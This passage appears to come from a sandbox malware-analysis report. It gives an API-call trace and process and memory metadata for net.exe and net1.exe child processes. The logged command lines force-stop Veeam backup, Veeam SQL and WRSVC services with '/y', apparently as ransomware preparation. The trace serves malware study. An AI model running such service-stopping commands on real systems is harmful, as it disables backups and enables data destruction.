(_String1="work", _String2="VEEAMNFSSVC") returned 1 [0119.493] _wcsicmp (_String1="wksta", _String2="VEEAMNFSSVC") returned 1 [0119.493] _wcsicmp (_String1="prdr", _String2="VEEAMNFSSVC") returned -6 [0119.493] _wcsicmp (_String1="devrdr", _String2="VEEAMNFSSVC") returned -18 [0119.493] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMNFSSVC") returned -10 [0119.493] _wcsicmp (_String1="server", _String2="VEEAMNFSSVC") returned -3 [0119.493] _wcsicmp (_String1="svr", _String2="VEEAMNFSSVC") returned -3 [0119.493] _wcsicmp (_String1="srv", _String2="VEEAMNFSSVC") returned -3 [0119.493] _wcsicmp (_String1="lanmanserver", _String2="VEEAMNFSSVC") returned -10 [0119.493] _wcsicmp (_String1="alerter", _String2="VEEAMNFSSVC") returned -21 [0119.493] _wcsicmp (_String1="netlogon", _String2="VEEAMNFSSVC") returned -8 [0119.493] NetServiceControl (in: servername=0x0, service="VEEAMNFSSVC", opcode=0x0, arg=0x0, bufptr=0x10f750 | out: bufptr=0x10f750) returned 0x889 [0119.494] wcscpy_s (in: _Destination=0xff1e80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0119.494] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0119.496] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff1e5b50, nSize=0x800, Arguments=0xff1e7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0119.497] GetFileType (hFile=0xb) returned 0x2 [0119.498] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f618 | out: lpMode=0x10f618) returned 1 [0119.498] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1e5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x10f610, lpReserved=0x0 | out: lpBuffer=0xff1e5b50*, lpNumberOfCharsWritten=0x10f610*=0x1e) returned 1 [0119.498] GetFileType (hFile=0xb) returned 0x2 [0119.498] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f618 | out: lpMode=0x10f618) returned 1 [0119.499] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f610, lpReserved=0x0 | out: lpBuffer=0xff1c1efc*, lpNumberOfCharsWritten=0x10f610*=0x2) returned 1 [0119.499] _ultow (in: _Dest=0x889, _Radix=1111680 | out: _Dest=0x889) returned="2185" [0119.499] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff1e5b50, nSize=0x800, Arguments=0xff1e7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0119.499] GetFileType (hFile=0xb) returned 0x2 [0119.499] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f618 | out: lpMode=0x10f618) returned 1 [0119.500] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1e5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x10f610, lpReserved=0x0 | out: lpBuffer=0xff1e5b50*, lpNumberOfCharsWritten=0x10f610*=0x34) returned 1 [0119.500] GetFileType (hFile=0xb) returned 0x2 [0119.500] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f618 | out: lpMode=0x10f618) returned 1 [0119.500] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f610, lpReserved=0x0 | out: lpBuffer=0xff1c1efc*, lpNumberOfCharsWritten=0x10f610*=0x2) returned 1 [0119.501] NetApiBufferFree (Buffer=0x274d50) returned 0x0 [0119.501] NetApiBufferFree (Buffer=0x27c100) returned 0x0 [0119.501] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamNFSSvc /y" [0119.501] exit (_Code=2) Process: id = "356" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x51feb000" os_pid = "0xbd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop WRSVC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12529 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12530 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12531 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12532 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12533 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12534 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12535 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12536 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12537 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12538 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12539 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 12540 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12561 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12562 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 12563 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12564 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12565 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12566 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12567 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 892 os_tid = 0xbe4 Process: id = "357" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x7a30b000" os_pid = "0x990" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12568 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12569 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12570 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12571 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12572 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12573 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12574 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12575 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12576 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12577 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12578 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 12579 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12580 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12581 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12582 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12583 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12584 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12585 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12586 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 894 os_tid = 0xc28 Process: id = "358" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6294000" os_pid = "0xbf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "351" os_parent_pid = "0x994" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamRESTSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12587 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12588 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12589 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12590 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12591 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12592 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12593 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12594 start_va = 0xff880000 end_va = 0xff8b2fff entry_point = 0xff880000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12595 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12596 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12597 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 12598 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12599 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12600 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 12601 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12602 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12603 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12604 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12605 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12606 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12607 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 12608 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 12609 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12610 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12611 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12612 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12613 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12614 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12615 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12616 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12617 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12618 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12619 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12620 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12621 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12622 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12623 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12624 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12720 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 896 os_tid = 0xb60 [0119.763] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fb90 | out: lpSystemTimeAsFileTime=0x24fb90*(dwLowDateTime=0xfc82b8f0, dwHighDateTime=0x1d48689)) [0119.763] GetCurrentProcessId () returned 0xbf8 [0119.763] GetCurrentThreadId () returned 0xb60 [0119.763] GetTickCount () returned 0x27973 [0119.763] QueryPerformanceCounter (in: lpPerformanceCount=0x24fb98 | out: lpPerformanceCount=0x24fb98*=1816668100000) returned 1 [0119.764] GetModuleHandleW (lpModuleName=0x0) returned 0xff880000 [0119.764] __set_app_type (_Type=0x1) [0119.764] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff899c9c) returned 0x0 [0119.764] __getmainargs (in: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788, _DoWildCard=0, _StartInfo=0xff8a479c | out: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788) returned 0 [0119.764] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.764] GetConsoleOutputCP () returned 0x1b5 [0119.862] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8acec0 | out: lpCPInfo=0xff8acec0) returned 1 [0119.862] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0119.864] sprintf_s (in: _DstBuf=0x24fb38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0119.864] setlocale (category=0, locale=".437") returned="English_United States.437" [0119.865] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0119.865] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0119.865] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamRESTSvc /y" [0119.865] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f8d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0119.865] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0119.865] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fb28 | out: Buffer=0x24fb28*=0xc4d50) returned 0x0 [0119.865] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fb28 | out: Buffer=0x24fb28*=0xcc100) returned 0x0 [0119.865] _fileno (_File=0x7fefdba2a80) returned 0 [0119.865] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0119.866] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0119.866] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0119.866] _wcsicmp (_String1="config", _String2="stop") returned -16 [0119.866] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0119.866] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0119.866] _wcsicmp (_String1="file", _String2="stop") returned -13 [0119.866] _wcsicmp (_String1="files", _String2="stop") returned -13 [0119.866] _wcsicmp (_String1="group", _String2="stop") returned -12 [0119.866] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0119.866] _wcsicmp (_String1="help", _String2="stop") returned -11 [0119.866] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0119.866] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0119.866] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0119.866] _wcsicmp (_String1="session", _String2="stop") returned -15 [0119.866] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0119.866] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0119.866] _wcsicmp (_String1="share", _String2="stop") returned -12 [0119.866] _wcsicmp (_String1="start", _String2="stop") returned -14 [0119.866] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0119.866] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0119.866] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0119.866] _wcsicmp (_String1="accounts", _String2="VeeamRESTSvc") returned -21 [0119.866] _wcsicmp (_String1="computer", _String2="VeeamRESTSvc") returned -19 [0119.866] _wcsicmp (_String1="config", _String2="VeeamRESTSvc") returned -19 [0119.866] _wcsicmp (_String1="continue", _String2="VeeamRESTSvc") returned -19 [0119.866] _wcsicmp (_String1="cont", _String2="VeeamRESTSvc") returned -19 [0119.866] _wcsicmp (_String1="file", _String2="VeeamRESTSvc") returned -16 [0119.866] _wcsicmp (_String1="files", _String2="VeeamRESTSvc") returned -16 [0119.866] _wcsicmp (_String1="group", _String2="VeeamRESTSvc") returned -15 [0119.866] _wcsicmp (_String1="groups", _String2="VeeamRESTSvc") returned -15 [0119.866] _wcsicmp (_String1="help", _String2="VeeamRESTSvc") returned -14 [0119.866] _wcsicmp (_String1="helpmsg", _String2="VeeamRESTSvc") returned -14 [0119.866] _wcsicmp (_String1="localgroup", _String2="VeeamRESTSvc") returned -10 [0119.866] _wcsicmp (_String1="pause", _String2="VeeamRESTSvc") returned -6 [0119.866] _wcsicmp (_String1="session", _String2="VeeamRESTSvc") returned -3 [0119.866] _wcsicmp (_String1="sessions", _String2="VeeamRESTSvc") returned -3 [0119.866] _wcsicmp (_String1="sess", _String2="VeeamRESTSvc") returned -3 [0119.867] _wcsicmp (_String1="share", _String2="VeeamRESTSvc") returned -3 [0119.867] _wcsicmp (_String1="start", _String2="VeeamRESTSvc") returned -3 [0119.867] _wcsicmp (_String1="stats", _String2="VeeamRESTSvc") returned -3 [0119.867] _wcsicmp (_String1="statistics", _String2="VeeamRESTSvc") returned -3 [0119.867] _wcsicmp (_String1="stop", _String2="VeeamRESTSvc") returned -3 [0119.867] _wcsicmp (_String1="time", _String2="VeeamRESTSvc") returned -2 [0119.867] _wcsicmp (_String1="user", _String2="VeeamRESTSvc") returned -1 [0119.867] _wcsicmp (_String1="users", _String2="VeeamRESTSvc") returned -1 [0119.867] _wcsicmp (_String1="msg", _String2="VeeamRESTSvc") returned -9 [0119.867] _wcsicmp (_String1="messenger", _String2="VeeamRESTSvc") returned -9 [0119.867] _wcsicmp (_String1="receiver", _String2="VeeamRESTSvc") returned -4 [0119.867] _wcsicmp (_String1="rcv", _String2="VeeamRESTSvc") returned -4 [0119.867] _wcsicmp (_String1="netpopup", _String2="VeeamRESTSvc") returned -8 [0119.867] _wcsicmp (_String1="redirector", _String2="VeeamRESTSvc") returned -4 [0119.867] _wcsicmp (_String1="redir", _String2="VeeamRESTSvc") returned -4 [0119.867] _wcsicmp (_String1="rdr", _String2="VeeamRESTSvc") returned -4 [0119.867] _wcsicmp (_String1="workstation", _String2="VeeamRESTSvc") returned 1 [0119.867] _wcsicmp (_String1="work", _String2="VeeamRESTSvc") returned 1 [0119.867] _wcsicmp (_String1="wksta", _String2="VeeamRESTSvc") returned 1 [0119.867] _wcsicmp (_String1="prdr", _String2="VeeamRESTSvc") returned -6 [0119.867] _wcsicmp (_String1="devrdr", _String2="VeeamRESTSvc") returned -18 [0119.867] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamRESTSvc") returned -10 [0119.867] _wcsicmp (_String1="server", _String2="VeeamRESTSvc") returned -3 [0119.867] _wcsicmp (_String1="svr", _String2="VeeamRESTSvc") returned -3 [0119.867] _wcsicmp (_String1="srv", _String2="VeeamRESTSvc") returned -3 [0119.867] _wcsicmp (_String1="lanmanserver", _String2="VeeamRESTSvc") returned -10 [0119.867] _wcsicmp (_String1="alerter", _String2="VeeamRESTSvc") returned -21 [0119.867] _wcsicmp (_String1="netlogon", _String2="VeeamRESTSvc") returned -8 [0119.867] _wcsupr (in: _String="VeeamRESTSvc" | out: _String="VEEAMRESTSVC") returned="VEEAMRESTSVC" [0119.867] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xcce10 [0119.871] GetServiceKeyNameW (in: hSCManager=0xcce10, lpDisplayName="VEEAMRESTSVC", lpServiceName=0xff8a5750, lpcchBuffer=0x24fa48 | out: lpServiceName="", lpcchBuffer=0x24fa48) returned 0 [0119.871] _wcsicmp (_String1="msg", _String2="VEEAMRESTSVC") returned -9 [0119.871] _wcsicmp (_String1="messenger", _String2="VEEAMRESTSVC") returned -9 [0119.872] _wcsicmp (_String1="receiver", _String2="VEEAMRESTSVC") returned -4 [0119.872] _wcsicmp (_String1="rcv", _String2="VEEAMRESTSVC") returned -4 [0119.872] _wcsicmp (_String1="redirector", _String2="VEEAMRESTSVC") returned -4 [0119.872] _wcsicmp (_String1="redir", _String2="VEEAMRESTSVC") returned -4 [0119.872] _wcsicmp (_String1="rdr", _String2="VEEAMRESTSVC") returned -4 [0119.872] 